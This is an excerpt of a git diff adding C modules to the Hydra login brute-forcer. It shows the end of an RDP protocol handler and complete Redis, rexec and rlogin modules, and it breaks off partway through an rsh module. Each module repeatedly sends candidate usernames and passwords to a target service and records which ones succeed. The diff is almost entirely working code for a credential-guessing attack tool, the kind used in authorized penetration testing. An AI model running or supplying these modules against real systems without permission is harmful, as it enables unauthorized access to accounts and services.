rdp_send_data(STREAM s, uint8 data_pdu_type) { + uint16 length; + + s_pop_layer(s, rdp_hdr); + length = s->end - s->p; + + out_uint16_le(s, length); + out_uint16_le(s, (RDP_PDU_DATA | 0x10)); + out_uint16_le(s, (g_mcs_userid + 1001)); + + out_uint32_le(s, g_rdp_shareid); + out_uint8(s, 0); /* pad */ + out_uint8(s, 1); /* streamid */ + out_uint16_le(s, (length - 14)); + out_uint8(s, data_pdu_type); + out_uint8(s, 0); /* compress_type */ + out_uint16(s, 0); /* compress_len */ + + sec_send(s, g_encryption ? SEC_ENCRYPT : 0); +} + +/* Input a string in Unicode + * + * Returns str_len of string + */ +int rdp_in_unistr(STREAM s, char *string, int str_size, int in_len) { + int i = 0; + int len = in_len / 2; + int rem = 0; + + if (len > str_size - 1) { + warning("server sent an unexpectedly long string, truncating\n"); + len = str_size - 1; + rem = in_len - 2 * len; + } + + while (i < len) { + in_uint8a(s, &string[i++], 1); + in_uint8s(s, 1); + } + + in_uint8s(s, rem); + string[len] = 0; + return len; +} + +/* Send a control PDU */ +static void rdp_send_control(uint16 action) { + STREAM s; + + s = rdp_init_data(8); + + out_uint16_le(s, action); + out_uint16(s, 0); /* userid */ + out_uint32(s, 0); /* control id */ + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_CONTROL); +} + +/* Send a synchronisation PDU */ +static void rdp_send_synchronise(void) { + STREAM s; + + s = rdp_init_data(4); + out_uint16_le(s, 1); /* type */ + out_uint16_le(s, 1002); + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_SYNCHRONISE); +} + +/* Send a single input event */ +void rdp_send_input(uint32 time, uint16 message_type, uint16 device_flags, uint16 param1, uint16 param2) { + STREAM s; + + switch (message_type) { + case RDP_INPUT_MOUSE: + rdp_send_fast_input_mouse(time, device_flags, param1, param2); + break; + case RDP_INPUT_SCANCODE: + rdp_send_fast_input_kbd(time, device_flags, param1); + break; + default: + s = rdp_init_data(16); + out_uint16_le(s, 1); /* number of events */ + out_uint16(s, 0); /* pad */ + out_uint32_le(s, time); + out_uint16_le(s, message_type); + out_uint16_le(s, device_flags); + out_uint16_le(s, param1); + out_uint16_le(s, param2); + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_INPUT); + } +} + +/* Send an (empty) font information PDU */ +static void rdp_send_fonts(uint16 seq) { + STREAM s; + + s = rdp_init_data(8); + + out_uint16(s, 0); /* number of fonts */ + out_uint16_le(s, 0); /* pad? */ + out_uint16_le(s, seq); /* unknown */ + out_uint16_le(s, 0x32); /* entry size */ + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_FONT2); +} + +/* Output general capability set */ +static void rdp_out_general_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_GENERAL); + out_uint16_le(s, RDP_CAPLEN_GENERAL); + out_uint16_le(s, 1); /* OS major type */ + out_uint16_le(s, 3); /* OS minor type */ + out_uint16_le(s, 0x200); /* Protocol version */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Compression types */ + out_uint16_le(s, g_use_rdp5 ? 0x40d : 0); + /* Pad, according to T.128. 0x40d seems to + trigger + the server to start sending RDP5 packets. + However, the value is 0x1d04 with W2KTSK and + NT4MS. Hmm.. Anyway, thankyou, Microsoft, + for sending such information in a padding + field.. */ + out_uint16(s, 0); /* Update capability */ + out_uint16(s, 0); /* Remote unshare capability */ + out_uint16(s, 0); /* Compression level */ + out_uint16(s, 0); /* Pad */ +} + +/* Output bitmap capability set */ +static void rdp_out_bitmap_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_BITMAP); + out_uint16_le(s, RDP_CAPLEN_BITMAP); + out_uint16_le(s, g_server_depth); /* Preferred colour depth */ + out_uint16_le(s, 1); /* Receive 1 BPP */ + out_uint16_le(s, 1); /* Receive 4 BPP */ + out_uint16_le(s, 1); /* Receive 8 BPP */ + out_uint16_le(s, 800); /* Desktop width */ + out_uint16_le(s, 600); /* Desktop height */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 1); /* Allow resize */ + out_uint16_le(s, g_bitmap_compression ? 1 : 0); /* Support compression */ + out_uint16(s, 0); /* Unknown */ + out_uint16_le(s, 1); /* Unknown */ + out_uint16(s, 0); /* Pad */ +} + +/* Output order capability set */ +static void rdp_out_order_caps(STREAM s) { + uint8 order_caps[32]; + + memset(order_caps, 0, 32); + order_caps[0] = 1; /* dest blt */ + order_caps[1] = 1; /* pat blt */ + order_caps[2] = 1; /* screen blt */ + order_caps[3] = (g_bitmap_cache ? 1 : 0); /* memblt */ + order_caps[4] = 0; /* triblt */ + order_caps[8] = 1; /* line */ + order_caps[9] = 1; /* line */ + order_caps[10] = 1; /* rect */ + order_caps[11] = (g_desktop_save ? 1 : 0); /* desksave */ + order_caps[13] = 1; /* memblt */ + order_caps[14] = 1; /* triblt */ + order_caps[20] = 1; /* polygon */ + order_caps[21] = 1; /* polygon2 */ + order_caps[22] = 1; /* polyline */ + order_caps[25] = 1; /* ellipse */ + order_caps[26] = 1; /* ellipse2 */ + order_caps[27] = 1; /* text2 */ + out_uint16_le(s, RDP_CAPSET_ORDER); + out_uint16_le(s, RDP_CAPLEN_ORDER); + + out_uint8s(s, 20); /* Terminal desc, pad */ + out_uint16_le(s, 1); /* Cache X granularity */ + out_uint16_le(s, 20); /* Cache Y granularity */ + out_uint16(s, 0); /* Pad */ + out_uint16_le(s, 1); /* Max order level */ + out_uint16_le(s, 0x147); /* Number of fonts */ + out_uint16_le(s, 0x2a); /* Capability flags */ + out_uint8p(s, order_caps, 32); /* Orders supported */ + out_uint16_le(s, 0x6a1); /* Text capability flags */ + out_uint8s(s, 6); /* Pad */ + out_uint32_le(s, g_desktop_save == False ? 0 : 0x38400); /* Desktop cache size */ + out_uint32(s, 0); /* Unknown */ + out_uint32_le(s, 0x4e4); /* Unknown */ +} + +/* Output bitmap cache capability set */ +static void rdp_out_bmpcache_caps(STREAM s) { + int Bpp; + + out_uint16_le(s, RDP_CAPSET_BMPCACHE); + out_uint16_le(s, RDP_CAPLEN_BMPCACHE); + Bpp = (g_server_depth + 7) / 8; /* bytes per pixel */ + out_uint8s(s, 24); /* unused */ + out_uint16_le(s, 0x258); /* entries */ + out_uint16_le(s, 0x100 * Bpp); /* max cell size */ + out_uint16_le(s, 0x12c); /* entries */ + out_uint16_le(s, 0x400 * Bpp); /* max cell size */ + out_uint16_le(s, 0x106); /* entries */ + out_uint16_le(s, 0x1000 * Bpp); /* max cell size */ +} + +/* Output bitmap cache v2 capability set */ +static void rdp_out_bmpcache2_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_BMPCACHE2); + out_uint16_le(s, RDP_CAPLEN_BMPCACHE2); + out_uint16_le(s, g_bitmap_cache_persist_enable ? 2 : 0); /* version */ + out_uint16_be(s, 3); /* number of caches in this set */ + + /* max cell size for cache 0 is 16x16, 1 = 32x32, 2 = 64x64, etc */ + out_uint32_le(s, BMPCACHE2_C0_CELLS); + out_uint32_le(s, BMPCACHE2_C1_CELLS); + out_uint32_le(s, BMPCACHE2_C2_CELLS); + out_uint8s(s, 20); /* other bitmap caches not used */ +} + +/* Output control capability set */ +static void rdp_out_control_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_CONTROL); + out_uint16_le(s, RDP_CAPLEN_CONTROL); + out_uint16(s, 0); /* Control capabilities */ + out_uint16(s, 0); /* Remote detach */ + out_uint16_le(s, 2); /* Control interest */ + out_uint16_le(s, 2); /* Detach interest */ +} + +/* Output activation capability set */ +static void rdp_out_activate_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_ACTIVATE); + out_uint16_le(s, RDP_CAPLEN_ACTIVATE); + out_uint16(s, 0); /* Help key */ + out_uint16(s, 0); /* Help index key */ + out_uint16(s, 0); /* Extended help key */ + out_uint16(s, 0); /* Window activate */ +} + +/* Output pointer capability set */ +static void rdp_out_pointer_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_POINTER); + out_uint16_le(s, RDP_CAPLEN_POINTER); + out_uint16(s, 0); /* Colour pointer */ + out_uint16_le(s, 20); /* Cache size */ +} + +/* Output new pointer capability set */ +static void rdp_out_newpointer_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_POINTER); + out_uint16_le(s, RDP_CAPLEN_NEWPOINTER); + out_uint16_le(s, 1); /* Colour pointer */ + out_uint16_le(s, 20); /* Cache size */ + out_uint16_le(s, 20); /* Cache size for new pointers */ +} + +/* Output share capability set */ +static void rdp_out_share_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_SHARE); + out_uint16_le(s, RDP_CAPLEN_SHARE); + out_uint16(s, 0); /* userid */ + out_uint16(s, 0); /* pad */ +} + +/* Output colour cache capability set */ +static void rdp_out_colcache_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_COLCACHE); + out_uint16_le(s, RDP_CAPLEN_COLCACHE); + out_uint16_le(s, 6); /* cache size */ + out_uint16(s, 0); /* pad */ +} + +/* Output brush cache capability set */ +static void rdp_out_brushcache_caps(STREAM s) { + out_uint16_le(s, RDP_CAPSET_BRUSHCACHE); + out_uint16_le(s, RDP_CAPLEN_BRUSHCACHE); + out_uint32_le(s, 1); /* cache type */ +} + +static uint8 caps_0x0d[] = { + 0x01, 0x00, 0x00, 0x00, 0x09, 0x04, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 +}; + +static uint8 caps_0x0c[] = { 0x01, 0x00, 0x00, 0x00 }; + +static uint8 caps_0x0e[] = { 0x01, 0x00, 0x00, 0x00 }; + +static uint8 caps_0x10[] = { + 0xFE, 0x00, 0x04, 0x00, 0xFE, 0x00, 0x04, 0x00, + 0xFE, 0x00, 0x08, 0x00, 0xFE, 0x00, 0x08, 0x00, + 0xFE, 0x00, 0x10, 0x00, 0xFE, 0x00, 0x20, 0x00, + 0xFE, 0x00, 0x40, 0x00, 0xFE, 0x00, 0x80, 0x00, + 0xFE, 0x00, 0x00, 0x01, 0x40, 0x00, 0x00, 0x08, + 0x00, 0x01, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00 +}; + +/* Output unknown capability sets */ +static void rdp_out_unknown_caps(STREAM s, uint16 id, uint16 length, uint8 * caps) { + out_uint16_le(s, id); + out_uint16_le(s, length); + out_uint8p(s, caps, length - 4); +} + +#define RDP5_FLAG 0x0030 + +/* Send a confirm active PDU */ +static void rdp_send_confirm_active(void) { + STREAM s; + uint32 sec_flags = g_encryption ? (RDP5_FLAG | SEC_ENCRYPT) : RDP5_FLAG; + uint16 caplen = + RDP_CAPLEN_GENERAL + RDP_CAPLEN_BITMAP + RDP_CAPLEN_ORDER + + RDP_CAPLEN_COLCACHE + RDP_CAPLEN_ACTIVATE + RDP_CAPLEN_CONTROL + RDP_CAPLEN_SHARE + RDP_CAPLEN_BRUSHCACHE + 0x58 + 0x08 + 0x08 + 0x34 /* unknown caps */ + + 4 /* w2k fix, sessionid */ ; + + if (g_use_rdp5) { + caplen += RDP_CAPLEN_BMPCACHE2; + caplen += RDP_CAPLEN_NEWPOINTER; + } else { + caplen += RDP_CAPLEN_BMPCACHE; + caplen += RDP_CAPLEN_POINTER; + } + + s = sec_init(sec_flags, 6 + 14 + caplen + sizeof(RDP_SOURCE)); + + out_uint16_le(s, 2 + 14 + caplen + sizeof(RDP_SOURCE)); + out_uint16_le(s, (RDP_PDU_CONFIRM_ACTIVE | 0x10)); /* Version 1 */ + out_uint16_le(s, (g_mcs_userid + 1001)); + + out_uint32_le(s, g_rdp_shareid); + out_uint16_le(s, 0x3ea); /* userid */ + out_uint16_le(s, sizeof(RDP_SOURCE)); + out_uint16_le(s, caplen); + + out_uint8p(s, RDP_SOURCE, sizeof(RDP_SOURCE)); + out_uint16_le(s, 0xe); /* num_caps */ + out_uint8s(s, 2); /* pad */ + + rdp_out_general_caps(s); + rdp_out_bitmap_caps(s); + rdp_out_order_caps(s); + if (g_use_rdp5) { + rdp_out_bmpcache2_caps(s); + rdp_out_newpointer_caps(s); + } else { + rdp_out_bmpcache_caps(s); + rdp_out_pointer_caps(s); + } + + rdp_out_colcache_caps(s); + rdp_out_activate_caps(s); + rdp_out_control_caps(s); + rdp_out_share_caps(s); + rdp_out_brushcache_caps(s); + + rdp_out_unknown_caps(s, 0x0d, 0x58, caps_0x0d); /* CAPSTYPE_INPUT */ + rdp_out_unknown_caps(s, 0x0c, 0x08, caps_0x0c); /* CAPSTYPE_SOUND */ + rdp_out_unknown_caps(s, 0x0e, 0x08, caps_0x0e); /* CAPSTYPE_FONT */ + rdp_out_unknown_caps(s, 0x10, 0x34, caps_0x10); /* CAPSTYPE_GLYPHCACHE */ + + s_mark_end(s); + sec_send(s, sec_flags); +} + +/* Process a general capability set */ +static void rdp_process_general_caps(STREAM s) { + uint16 pad2octetsB; /* rdp5 flags? */ + + in_uint8s(s, 10); + in_uint16_le(s, pad2octetsB); + if (!pad2octetsB) + g_use_rdp5 = False; +} + +/* Process a bitmap capability set */ +static void rdp_process_bitmap_caps(STREAM s) { + uint16 width, height, depth; + + in_uint16_le(s, depth); + in_uint8s(s, 6); + in_uint16_le(s, width); + in_uint16_le(s, height); + DEBUG(("setting desktop size and depth to: %dx%dx%d\n", width, height, depth)); +} + +/* Process server capabilities */ +static void rdp_process_server_caps(STREAM s, uint16 length) { + int n; + uint8 *next, *start; + uint16 ncapsets, capset_type, capset_length; + + start = s->p; + + in_uint16_le(s, ncapsets); + in_uint8s(s, 2); /* pad */ + + for (n = 0; n < ncapsets; n++) { + if (s->p > start + length) + return; + + in_uint16_le(s, capset_type); + in_uint16_le(s, capset_length); + + next = s->p + capset_length - 4; + + switch (capset_type) { + case RDP_CAPSET_GENERAL: + rdp_process_general_caps(s); + break; + + case RDP_CAPSET_BITMAP: + rdp_process_bitmap_caps(s); + break; + } + + s->p = next; + } +} + +/* Respond to a demand active PDU */ +static void process_demand_active(STREAM s) { + uint8 type; + uint16 len_src_descriptor, len_combined_caps; + + in_uint32_le(s, g_rdp_shareid); + in_uint16_le(s, len_src_descriptor); + in_uint16_le(s, len_combined_caps); + in_uint8s(s, len_src_descriptor); + + DEBUG(("DEMAND_ACTIVE(id=0x%x)\n", g_rdp_shareid)); + rdp_process_server_caps(s, len_combined_caps); + + rdp_send_confirm_active(); + rdp_send_synchronise(); + rdp_send_control(RDP_CTL_COOPERATE); + rdp_send_control(RDP_CTL_REQUEST_CONTROL); + rdp_recv(&type); /* RDP_PDU_SYNCHRONIZE */ + rdp_recv(&type); /* RDP_CTL_COOPERATE */ + rdp_recv(&type); /* RDP_CTL_GRANT_CONTROL */ + rdp_send_input(0, 0, 0, 0, 0); /* RDP_INPUT_SYNCHRONIZE */ + // here? XXX TODO BUGFIX + + if (g_use_rdp5) { + rdp_send_fonts(3); + } else { + rdp_send_fonts(1); + rdp_send_fonts(2); + } + + rdp_recv(&type); /* RDP_PDU_UNKNOWN 0x28 (Fonts?) */ + reset_order_state(); +} + +/* Process an update PDU */ +static void process_update_pdu(STREAM s) { + uint16 update_type, count; + + in_uint16_le(s, update_type); + + //ui_begin_update(); + switch (update_type) { + case RDP_UPDATE_ORDERS: + in_uint8s(s, 2); /* pad */ + in_uint16_le(s, count); + in_uint8s(s, 2); /* pad */ + process_orders(s, count); + break; + + case RDP_UPDATE_BITMAP: + //process_bitmap_updates(s); + break; + + case RDP_UPDATE_PALETTE: + //process_palette(s); + break; + + case RDP_UPDATE_SYNCHRONIZE: + break; + + default: + unimpl("update %d\n", update_type); + } +} + + +/* Process a disconnect PDU */ +void process_disconnect_pdu(STREAM s, uint32 * ext_disc_reason) { + in_uint32_le(s, *ext_disc_reason); + + DEBUG(("Received disconnect PDU\n")); +} + +/* Process data PDU */ +static BOOL process_data_pdu(STREAM s, uint32 * ext_disc_reason) { + uint8 data_pdu_type; + uint8 ctype; + uint16 clen; + uint32 len; + + in_uint8s(s, 6); /* shareid, pad, streamid */ + in_uint16_le(s, len); + in_uint8(s, data_pdu_type); + in_uint8(s, ctype); + in_uint16_le(s, clen); + clen -= 18; + + switch (data_pdu_type) { + case RDP_DATA_PDU_UPDATE: + process_update_pdu(s); + break; + + case RDP_DATA_PDU_CONTROL: + DEBUG(("Received Control PDU\n")); + break; + + case RDP_DATA_PDU_SYNCHRONISE: + DEBUG(("Received Sync PDU\n")); + break; + + case RDP_DATA_PDU_POINTER: + //process_pointer_pdu(s); + break; + + case RDP_DATA_PDU_BELL: + //ui_bell(); + break; + + case RDP_DATA_PDU_LOGON: + DEBUG(("Received Logon PDU\n")); + /* User logged on */ + login_result = LOGIN_SUCC; + return 1; + break; + + case RDP_DATA_PDU_DISCONNECT: + process_disconnect_pdu(s, ext_disc_reason); + + /* We used to return true and disconnect immediately here, but + * Windows Vista sends a disconnect PDU with reason 0 when + * reconnecting to a disconnected session, and MSTSC doesn't + * drop the connection. I think we should just save the status. + */ + break; + + default: + unimpl("data PDU %d\n", data_pdu_type); + } + return False; +} +#endif + +int service_rdp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-redis.c b/hydra-redis.c new file mode 100644 index 0000000..87fb432 --- /dev/null +++ b/hydra-redis.c @@ -0,0 +1,103 @@ +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; +char *buf; + +int start_redis(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *pass, buffer[510]; + char *empty = ""; + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + sprintf(buffer, "AUTH %.250s\r\n", pass); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf[0] == '+') { + hydra_report_found_host(port, ip, "redis", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + if (verbose > 1) + hydra_report(stderr, "[VERBOSE] Authentication failed for password %s\n", pass); + hydra_completed_pair(); + + free(buf); + + return 1; +} + +void service_redis_core(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, int tls) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_REDIS, mysslport = PORT_REDIS_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + hydra_child_exit(0); + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + usleep(250); + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_redis(sock, ip, port, options, miscptr, fp); + break; + case 3: /* error exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + case 4: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +void service_redis(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_redis_core(ip, sp, options, miscptr, fp, port, 0); +} + +int service_redis_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-rexec.c b/hydra-rexec.c new file mode 100644 index 0000000..8fadfdd --- /dev/null +++ b/hydra-rexec.c @@ -0,0 +1,110 @@ +#include "hydra-mod.h" + +// no memleaks found on 110425 + +#define COMMAND "/bin/ls /" + +extern char *HYDRA_EXIT; +char *buf; + +int start_rexec(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[300] = "", buffer2[100], *bptr = buffer2; + int ret; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + memset(buffer2, 0, sizeof(buffer2)); + bptr++; + + strcpy(bptr, login); + bptr += 1 + strlen(login); + + strcpy(bptr, pass); + bptr += 1 + strlen(pass); + + strcpy(bptr, COMMAND); + + if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(pass) + strlen(COMMAND), 0) < 0) { + return 1; + } + + ret = hydra_recv(s, buffer, sizeof(buffer)); + + if (ret > 0 && buffer[0] == 0) { + hydra_report_found_host(port, ip, "rexec", fp); + hydra_completed_pair_found(); + } else + hydra_completed_pair(); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_rexec(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_REXEC, mysslport = PORT_REXEC_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_rexec(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + + } + run = next_run; + } +} + +int service_rexec_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-rlogin.c b/hydra-rlogin.c new file mode 100644 index 0000000..2488ccf --- /dev/null +++ b/hydra-rlogin.c @@ -0,0 +1,149 @@ +#include "hydra-mod.h" + +/* + +RFC 1258 +client have to use port from 512 -> 1023 or server is denying the connection + +no memleaks found on 110425 +*/ + + +#define TERM "vt100/9600" + +extern char *HYDRA_EXIT; +char *buf; + +int start_rlogin(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[300] = "", buffer2[100], *bptr = buffer2; + int ret; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + memset(buffer2, 0, sizeof(buffer2)); + bptr++; + + strcpy(bptr, login); + bptr += 1 + strlen(login); + + strcpy(bptr, login); + bptr += 1 + strlen(login); + + strcpy(bptr, TERM); + + if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(TERM), 0) < 0) { + return 4; + } + ret = hydra_recv(s, buffer, sizeof(buffer)); + /* 0x00 is sent but hydra_recv transformed it */ + if (strlen(buffer) == 0) + ret = hydra_recv(s, buffer, sizeof(buffer)); + + if (ret > 0 && (strstr(buffer, "rlogind:") != NULL)) + return 1; + + if (ret > 0 && (strstr(buffer, "ssword") != NULL)) { + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + sprintf(buffer2, "%s\r", pass); + if (hydra_send(s, buffer2, 1 + strlen(pass), 0) < 0) { + return 1; + } + memset(buffer, 0, sizeof(buffer)); + ret = hydra_recv(s, buffer, sizeof(buffer)); + if (strcmp(buffer, "\r\n")) + ret = hydra_recv(s, buffer, sizeof(buffer)); + } + /* Authentication failure */ + + if (ret > 0 && (strstr(buffer, "ssword") == NULL)) { +#ifdef HAVE_PCRE + if (!hydra_string_match(buffer, "\\s(failure|incorrect|denied)")) { +#else + /* check for failure and incorrect msg */ + if ((strstr(buffer, "ailure") == NULL) && (strstr(buffer, "ncorrect") == NULL) && (strstr(buffer, "denied") == NULL)) { +#endif + hydra_report_found_host(port, ip, "rlogin", fp); + hydra_completed_pair_found(); + } else { + hydra_completed_pair(); + } + } else { + /* if password is asked a second time, it means the pass we provided is wrong */ + hydra_completed_pair(); + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_rlogin(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_RLOGIN, mysslport = PORT_RLOGIN_SSL; + + hydra_register_socket(sp); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + /* 512 -> 1023 */ + hydra_set_srcport(1023); + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_rlogin(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_rlogin_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-rsh.c b/hydra-rsh.c new file mode 100644 index 0000000..1a44e16 --- /dev/null +++ b/hydra-rsh.c @@ -0,0 +1,122 @@ +#include "hydra-mod.h" +#define COMMAND "/bin/ls /" + +/* + +password is not used here, just try to find rsh accounts +you should use -p '' + +no memleaks found on 110425 + +*/ + +extern char *HYDRA_EXIT; +char *buf; + +int start_rsh(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, buffer[300] = "", buffer2[100], *bptr = buffer2; + int ret; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + + memset(buffer2, 0, sizeof(buffer2)); + bptr++; + + strcpy(bptr, login); + bptr += 1 + strlen(login); + + strcpy(bptr, login); + bptr += 1 + strlen(login); + + strcpy(bptr, COMMAND); + + if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(COMMAND), 0) < 0) { + return 4; + } + + ret = hydra_recv(s, buffer, sizeof(buffer)); + /* 0x00 is sent but hydra_recv transformed it */ + if (strlen(buffer) == 0) + ret = hydra_recv(s, buffer, sizeof(buffer)); +#ifdef HAVE_PCRE + if (ret > 0 && (!hydra_string_match(buffer, "\\s(failure|incorrect|denied)"))) { +#else + if (ret > 0 && (strstr(buffer, "ailure") == NULL) && (strstr(buffer, "ncorrect") == NULL) && (strstr(buffer, "denied") == NULL)) { +#endif + hydra_report_found_host(port, ip, "rsh", fp); + hydra_completed_pair_found(); + } else { + hydra_completed_pair(); + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_rsh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_RSH, mysslport = PORT_RSH_SSL; + + hydra_register_socket(sp); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + hydra_set_srcport(1023); + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", 